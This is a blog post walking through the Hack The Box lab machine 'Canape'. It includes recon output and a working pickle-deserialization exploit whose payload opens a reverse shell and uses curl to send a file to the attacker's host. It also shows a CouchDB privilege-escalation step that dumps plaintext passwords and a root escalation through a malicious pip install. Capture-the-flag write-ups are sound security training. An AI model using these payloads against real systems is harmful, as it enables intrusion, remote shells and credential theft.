<!DOCTYPE html>
<html lang="en"><head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="viewport" content="width=device-width, initial-scale=1"><!-- Begin Jekyll SEO tag v2.8.0 -->
<title>HTB - Canape | shafouz blog</title>
<meta name="generator" content="Jekyll v4.2.2" />
<meta property="og:title" content="HTB - Canape" />
<meta name="author" content="shafouz" />
<meta property="og:locale" content="en_US" />
<link rel="canonical" href="https://shafouz.github.io/2024/12/23/HTB-Canape.html" />
<meta property="og:url" content="https://shafouz.github.io/2024/12/23/HTB-Canape.html" />
<meta property="og:site_name" content="shafouz blog" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2024-12-23T15:38:00+00:00" />
<meta name="twitter:card" content="summary" />
<meta property="twitter:title" content="HTB - Canape" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","author":{"@type":"Person","name":"shafouz"},"dateModified":"2024-12-23T15:38:00+00:00","datePublished":"2024-12-23T15:38:00+00:00","headline":"HTB - Canape","mainEntityOfPage":{"@type":"WebPage","@id":"https://shafouz.github.io/2024/12/23/HTB-Canape.html"},"url":"https://shafouz.github.io/2024/12/23/HTB-Canape.html"}</script>
<!-- End Jekyll SEO tag -->
<link rel="stylesheet" href="/assets/css/style.css"><link type="application/atom+xml" rel="alternate" href="https://shafouz.github.io/feed.xml" title="shafouz blog" />
<!-- Google tag (gtag.js) -->
  <script async src="https://www.googletagmanager.com/gtag/js?id=G-F6L4J94HSJ"></script>
  <script>
    window.dataLayer = window.dataLayer || [];
    function gtag(){dataLayer.push(arguments);}
    gtag('js', new Date());

    gtag('config', 'G-F6L4J94HSJ');
  </script>
</head>
<body><header class="site-header">

  <div class="wrapper"><a class="site-title" rel="author" href="/">shafouz blog</a></div>
</header>
<main class="page-content" aria-label="Content">
      <div class="wrapper">
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">

  <header class="post-header">
    <h1 class="post-title p-name" itemprop="name headline">HTB - Canape</h1>
    <p class="post-meta"><time class="dt-published" datetime="2024-12-23T15:38:00+00:00" itemprop="datePublished">
        Dec 23, 2024
      </time></p>
  </header>

  <div class="post-content e-content" itemprop="articleBody">
    
<p>Canape is one of the most popular boxes on htb. The first step involves finding the source code through a git repo. After that we exploit a pickle deserialization to get a shell as <code class="language-plaintext highlighter-rouge">www-data</code>. Then we use one of the couchdb CVEs to escalate to the <code class="language-plaintext highlighter-rouge">homer</code> user. And finally we use sudo privileges on pip to get the <code class="language-plaintext highlighter-rouge">root</code> shell.</p>

<h1 id="nmap">nmap</h1>
<p>Starting with nmap we get a <code class="language-plaintext highlighter-rouge">.git</code>.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>~/workspace/projects/htb/canape » nmap <span class="nt">-p-</span> <span class="nt">--min-rate</span> 1024 <span class="si">$(</span><span class="nb">cat </span>ip.txt<span class="si">)</span>
Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-12-23 12:58 <span class="nt">-04</span>
Stats: 0:00:32 elapsed<span class="p">;</span> 0 hosts completed <span class="o">(</span>1 up<span class="o">)</span>, 1 undergoing Connect Scan
Connect Scan Timing: About 25.55% <span class="k">done</span><span class="p">;</span> ETC: 13:00 <span class="o">(</span>0:01:33 remaining<span class="o">)</span>
Nmap scan report <span class="k">for </span>10.10.10.70
Host is up <span class="o">(</span>0.16s latency<span class="o">)</span><span class="nb">.</span>
Not shown: 65533 filtered tcp ports <span class="o">(</span>no-response<span class="o">)</span>
PORT      STATE SERVICE
80/tcp    open  http
65535/tcp open  unknown

Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>128.50 seconds
~/workspace/projects/htb/canape » nmap <span class="nt">-p</span> 80,65535 <span class="nt">-A</span> <span class="nt">--min-rate</span> 1024 <span class="si">$(</span><span class="nb">cat </span>ip.txt<span class="si">)</span>           1 ↵ shafou@shafou
Starting Nmap 7.93 <span class="o">(</span> https://nmap.org <span class="o">)</span> at 2024-12-23 13:00 <span class="nt">-04</span>
Nmap scan report <span class="k">for </span>canape.htb <span class="o">(</span>10.10.10.70<span class="o">)</span>
Host is up <span class="o">(</span>0.20s latency<span class="o">)</span><span class="nb">.</span>

PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.29 <span class="o">((</span>Ubuntu<span class="o">))</span>
|_http-title: Simpsons Fan Site
|_http-trane-info: Problem with XML parsing of /evox/about
| http-git:
|   10.10.10.70:80/.git/
|     Git repository found!
|     Repository description: Unnamed repository<span class="p">;</span> edit this file <span class="s1">'description'</span> to name the...
|     Last commit message: final <span class="c"># Please enter the commit message for your changes. Li...</span>
|     Remotes:
|_      http://git.canape.htb/simpsons.git
|_http-server-header: Apache/2.4.29 <span class="o">(</span>Ubuntu<span class="o">)</span>
65535/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.7 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span>
| ssh-hostkey:
|   2048 8d820b3190e4c885b2538ba17c3b65e1 <span class="o">(</span>RSA<span class="o">)</span>
|   256 22fc6ec35500850f24bff5796c928b68 <span class="o">(</span>ECDSA<span class="o">)</span>
|_  256 0d912751805e2ba3810de9d85c9b7735 <span class="o">(</span>ED25519<span class="o">)</span>
Service Info: OS: Linux<span class="p">;</span> CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class="nb">.</span>
Nmap <span class="k">done</span>: 1 IP address <span class="o">(</span>1 host up<span class="o">)</span> scanned <span class="k">in </span>13.93 seconds
</code></pre></div></div>

<h1 id="flask-app">flask app</h1>
<p>On the git repo there is a flask app which is vulnerable to pickle deserialization.</p>
<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">"/submit"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">"GET"</span><span class="p">,</span> <span class="s">"POST"</span><span class="p">])</span>
<span class="k">def</span> <span class="nf">submit</span><span class="p">():</span>
    <span class="n">error</span> <span class="o">=</span> <span class="bp">None</span>
    <span class="n">success</span> <span class="o">=</span> <span class="bp">None</span>

    <span class="k">if</span> <span class="n">request</span><span class="p">.</span><span class="n">method</span> <span class="o">==</span> <span class="s">"POST"</span><span class="p">:</span>
        <span class="k">try</span><span class="p">:</span>
            <span class="n">char</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">"character"</span><span class="p">]</span>
            <span class="n">quote</span> <span class="o">=</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">"quote"</span><span class="p">]</span>
            <span class="k">if</span> <span class="ow">not</span> <span class="n">char</span> <span class="ow">or</span> <span class="ow">not</span> <span class="n">quote</span><span class="p">:</span>
                <span class="n">error</span> <span class="o">=</span> <span class="bp">True</span>
            <span class="k">elif</span> <span class="ow">not</span> <span class="nb">any</span><span class="p">(</span><span class="n">c</span><span class="p">.</span><span class="n">lower</span><span class="p">()</span> <span class="ow">in</span> <span class="n">char</span><span class="p">.</span><span class="n">lower</span><span class="p">()</span> <span class="k">for</span> <span class="n">c</span> <span class="ow">in</span> <span class="n">WHITELIST</span><span class="p">):</span>
                <span class="n">error</span> <span class="o">=</span> <span class="bp">True</span>
            <span class="k">else</span><span class="p">:</span>
                <span class="c1"># TODO - Pickle into dictionary instead, `check` is ready
</span>                <span class="n">p_id</span> <span class="o">=</span> <span class="n">md5</span><span class="p">(</span><span class="n">char</span> <span class="o">+</span> <span class="n">quote</span><span class="p">).</span><span class="n">hexdigest</span><span class="p">()</span>
                <span class="n">outfile</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="s">"/tmp/"</span> <span class="o">+</span> <span class="n">p_id</span> <span class="o">+</span> <span class="s">".p"</span><span class="p">,</span> <span class="s">"wb"</span><span class="p">)</span>
		<span class="n">outfile</span><span class="p">.</span><span class="n">write</span><span class="p">(</span><span class="n">char</span> <span class="o">+</span> <span class="n">quote</span><span class="p">)</span>
		<span class="n">outfile</span><span class="p">.</span><span class="n">close</span><span class="p">()</span>
	        <span class="n">success</span> <span class="o">=</span> <span class="bp">True</span>
        <span class="k">except</span> <span class="nb">Exception</span> <span class="k">as</span> <span class="n">ex</span><span class="p">:</span>
            <span class="n">error</span> <span class="o">=</span> <span class="bp">True</span>

    <span class="k">return</span> <span class="n">render_template</span><span class="p">(</span><span class="s">"submit.html"</span><span class="p">,</span> <span class="n">error</span><span class="o">=</span><span class="n">error</span><span class="p">,</span> <span class="n">success</span><span class="o">=</span><span class="n">success</span><span class="p">)</span>

<span class="o">@</span><span class="n">app</span><span class="p">.</span><span class="n">route</span><span class="p">(</span><span class="s">"/check"</span><span class="p">,</span> <span class="n">methods</span><span class="o">=</span><span class="p">[</span><span class="s">"POST"</span><span class="p">])</span>
<span class="k">def</span> <span class="nf">check</span><span class="p">():</span>
    <span class="n">path</span> <span class="o">=</span> <span class="s">"/tmp/"</span> <span class="o">+</span> <span class="n">request</span><span class="p">.</span><span class="n">form</span><span class="p">[</span><span class="s">"id"</span><span class="p">]</span> <span class="o">+</span> <span class="s">".p"</span>
    <span class="n">data</span> <span class="o">=</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s">"rb"</span><span class="p">).</span><span class="n">read</span><span class="p">()</span>

    <span class="k">if</span> <span class="s">"p1"</span> <span class="ow">in</span> <span class="n">data</span><span class="p">:</span>
        <span class="n">item</span> <span class="o">=</span> <span class="n">cPickle</span><span class="p">.</span><span class="n">loads</span><span class="p">(</span><span class="n">data</span><span class="p">)</span>
    <span class="k">else</span><span class="p">:</span>
        <span class="n">item</span> <span class="o">=</span> <span class="n">data</span>

    <span class="k">return</span> <span class="s">"Still reviewing: "</span> <span class="o">+</span> <span class="n">item</span>
</code></pre></div></div>

<p>This part can be tricky. But it’s pretty easy if you use the <code class="language-plaintext highlighter-rouge">pickleassem</code> package. I got stuck here because I didn’t realize that the character name could be anywhere on the payload.</p>

<ul>
  <li>exploit:</li>
</ul>

<div class="language-python highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kn">import</span> <span class="nn">requests</span>
<span class="kn">from</span> <span class="nn">hashlib</span> <span class="kn">import</span> <span class="n">md5</span>

<span class="kn">from</span> <span class="nn">pickleassem</span> <span class="kn">import</span> <span class="n">PickleAssembler</span>

<span class="n">pa</span> <span class="o">=</span> <span class="n">PickleAssembler</span><span class="p">(</span><span class="n">proto</span><span class="o">=</span><span class="mi">1</span><span class="p">)</span>
<span class="n">pa</span><span class="p">.</span><span class="n">push_mark</span><span class="p">()</span>
<span class="n">pa</span><span class="p">.</span><span class="n">util_push</span><span class="p">(</span><span class="s">"bash -c 'bash -i &gt;&amp; /dev/tcp/10.10.14.41/4444 0&gt;&amp;1'; curl http://10.10.14.41:5000/ -d @/tmp/123; echo moe"</span><span class="p">)</span>
<span class="n">pa</span><span class="p">.</span><span class="n">build_inst</span><span class="p">(</span><span class="s">'os'</span><span class="p">,</span> <span class="s">'system'</span><span class="p">)</span>
<span class="n">pa</span><span class="p">.</span><span class="n">push_binstring</span><span class="p">(</span><span class="s">'p1'</span><span class="p">)</span>
<span class="n">payload</span> <span class="o">=</span> <span class="n">pa</span><span class="p">.</span><span class="n">assemble</span><span class="p">()</span>

<span class="n">burp0_url</span> <span class="o">=</span> <span class="s">"http://canape.htb:80/submit"</span>

<span class="n">char</span> <span class="o">=</span> <span class="n">payload</span><span class="p">[:</span><span class="o">-</span><span class="mi">1</span><span class="p">].</span><span class="n">decode</span><span class="p">()</span>
<span class="n">quote</span> <span class="o">=</span> <span class="s">"."</span>
<span class="n">burp0_data</span> <span class="o">=</span> <span class="p">{</span><span class="s">"character"</span><span class="p">:</span> <span class="n">char</span><span class="p">,</span> <span class="s">"quote"</span><span class="p">:</span> <span class="n">quote</span><span class="p">}</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">burp0_url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">burp0_data</span><span class="p">,</span> <span class="n">proxies</span><span class="o">=</span><span class="p">{</span>
    <span class="s">'http'</span><span class="p">:</span> <span class="s">'http://0.0.0.0:8080'</span><span class="p">,</span>
    <span class="s">'https'</span><span class="p">:</span> <span class="s">'https://0.0.0.0:8080'</span>
<span class="p">})</span>
<span class="n">a</span> <span class="o">=</span> <span class="n">md5</span><span class="p">((</span><span class="n">char</span> <span class="o">+</span> <span class="n">quote</span><span class="p">).</span><span class="n">encode</span><span class="p">()).</span><span class="n">hexdigest</span><span class="p">()</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"DEBUGPRINT[3]: req.py:12: a=</span><span class="si">{</span><span class="n">a</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>

<span class="n">burp0_url</span> <span class="o">=</span> <span class="s">"http://canape.htb:80/check"</span>
<span class="n">burp0_data</span> <span class="o">=</span> <span class="p">{</span><span class="s">"id"</span><span class="p">:</span> <span class="n">a</span><span class="p">}</span>
<span class="n">res</span> <span class="o">=</span> <span class="n">requests</span><span class="p">.</span><span class="n">post</span><span class="p">(</span><span class="n">burp0_url</span><span class="p">,</span> <span class="n">data</span><span class="o">=</span><span class="n">burp0_data</span><span class="p">)</span>
<span class="k">print</span><span class="p">(</span><span class="sa">f</span><span class="s">"DEBUGPRINT[4]: req.py:17: res.text=</span><span class="si">{</span><span class="n">res</span><span class="p">.</span><span class="n">text</span><span class="si">}</span><span class="s">"</span><span class="p">)</span>
</code></pre></div></div>

<h1 id="www-data---homer">www-data -&gt; homer</h1>
<p>Some interesting files here but they don’t lead anywhere.
The most interesting part is couchdb on 127.0.0.1:5986</p>
<div class="language-json highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="p">{</span><span class="nl">"couchdb"</span><span class="p">:</span><span class="s2">"Welcome"</span><span class="p">,</span><span class="nl">"uuid"</span><span class="p">:</span><span class="s2">"132586dfde75b957085d59a5096e9c20"</span><span class="p">,</span><span class="nl">"version"</span><span class="p">:</span><span class="s2">"2.0.0"</span><span class="p">,</span><span class="nl">"vendor"</span><span class="p">:{</span><span class="nl">"name"</span><span class="p">:</span><span class="s2">"The Apache Software Foundation"</span><span class="p">}}</span><span class="w">
</span></code></pre></div></div>

<p>This version seems to be vulnerable to multiple cves. The one that worked was <code class="language-plaintext highlighter-rouge">CVE-2017-12636</code>. It gives us an admin user. We can then check the <code class="language-plaintext highlighter-rouge">passwords</code> db and find the ssh password for the <code class="language-plaintext highlighter-rouge">homer</code> user.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>DEBUGPRINT[2]: lab.py:29: res.text<span class="o">={</span><span class="s2">"_id"</span>:<span class="s2">"739c5ebdf3f7a001bebb8fc4380019e4"</span>,<span class="s2">"_rev"</span>:<span class="s2">"2-81cf17b971d9229c54be92eeee723296"</span>,<span class="s2">"item"</span>:<span class="s2">"ssh"</span>,<span class="s2">"password"</span>:<span class="s2">"B4jyA0xtytZi7esBNGp"</span>,<span class="s2">"user"</span>:<span class="s2">""</span><span class="o">}</span>
DEBUGPRINT[2]: lab.py:29: res.text<span class="o">={</span><span class="s2">"_id"</span>:<span class="s2">"739c5ebdf3f7a001bebb8fc43800368d"</span>,<span class="s2">"_rev"</span>:<span class="s2">"2-43f8db6aa3b51643c9a0e21cacd92c6e"</span>,<span class="s2">"item"</span>:<span class="s2">"couchdb"</span>,<span class="s2">"password"</span>:<span class="s2">"r3lax0Nth3C0UCH"</span>,<span class="s2">"user"</span>:<span class="s2">"couchy"</span><span class="o">}</span>
DEBUGPRINT[2]: lab.py:29: res.text<span class="o">={</span><span class="s2">"_id"</span>:<span class="s2">"739c5ebdf3f7a001bebb8fc438003e5f"</span>,<span class="s2">"_rev"</span>:<span class="s2">"1-77cd0af093b96943ecb42c2e5358fe61"</span>,<span class="s2">"item"</span>:<span class="s2">"simpsonsfanclub.com"</span>,<span class="s2">"password"</span>:<span class="s2">"h02ddjdj2k2k2"</span>,<span class="s2">"user"</span>:<span class="s2">"homer"</span><span class="o">}</span>
DEBUGPRINT[2]: lab.py:29: res.text<span class="o">={</span><span class="s2">"_id"</span>:<span class="s2">"739c5ebdf3f7a001bebb8fc438004738"</span>,<span class="s2">"_rev"</span>:<span class="s2">"1-49a20010e64044ee7571b8c1b902cf8c"</span>,<span class="s2">"user"</span>:<span class="s2">"homerj0121"</span>,<span class="s2">"item"</span>:<span class="s2">"github"</span>,<span class="s2">"password"</span>:<span class="s2">"STOP STORING YOUR PASSWORDS HERE -Admin"</span><span class="o">}</span>
</code></pre></div></div>

<h1 id="homer---root">homer -&gt; root</h1>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>homer@canape:~<span class="nv">$ </span><span class="nb">cat </span>user.txt
9a3d7<span class="k">***************************</span>
</code></pre></div></div>

<p>Running <code class="language-plaintext highlighter-rouge">sudo -l</code> on homer shows that we can run <code class="language-plaintext highlighter-rouge">pip</code> as root.</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Matching Defaults entries <span class="k">for </span>homer on canape:
    env_reset, mail_badpass,
    <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin

User homer may run the following commands on canape:
    <span class="o">(</span>root<span class="o">)</span> /usr/bin/pip <span class="nb">install</span> <span class="k">*</span>
</code></pre></div></div>
<p>Found this repo that has a poc for running code on pip install and adapted a little bit.</p>
<ul>
  <li><a href="https://github.com/mschwager/0wned">0wned</a></li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># sudo /usr/bin/pip install ./0wned</span>
homer@canape:/tmp/la<span class="nv">$ </span><span class="nb">cat </span>root.txt
d8bf7<span class="k">***************************</span>
</code></pre></div></div>


  </div><a class="u-url" href="/2024/12/23/HTB-Canape.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <div class="footer-col-wrapper">
      <div class="footer-col">
        <p class="feed-subscribe">
          <a href="https://shafouz.github.io/feed.xml">
            <svg class="svg-icon orange">
              <use xlink:href="/assets/minima-social-icons.svg#rss"></use>
            </svg><span>Subscribe</span>
          </a>
        </p>
        <ul class="contact-list">
          <li class="p-name">shafouz</li>
          <li><a class="u-email" href="mailto:jlmacedomatos@gmail.com">contact</a></li>
        </ul>
      </div>
      <div class="footer-col">
        <p></p>
      </div>
    </div>

    <div class="social-links"><ul class="social-media-list"><li>
  <a rel="me" href="https://hackerone.com/shafou" target="_blank" title="hackerone">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#hackerone"></use>
    </svg>
  </a>
</li>
<li>
  <a rel="me" href="https://github.com/shafouz" target="_blank" title="github">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#github"></use>
    </svg>
  </a>
</li>
<li>
  <a rel="me" href="https://twitter.com/shafouzzzzzz" target="_blank" title="twitter">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#twitter"></use>
    </svg>
  </a>
</li>
<li>
  <a rel="me" href="https://www.linkedin.com/in/joao-luca/" target="_blank" title="linkedin">
    <svg class="svg-icon grey">
      <use xlink:href="/assets/minima-social-icons.svg#linkedin"></use>
    </svg>
  </a>
</li>
</ul>
</div>

  </div>

</footer>
</body>

</html>
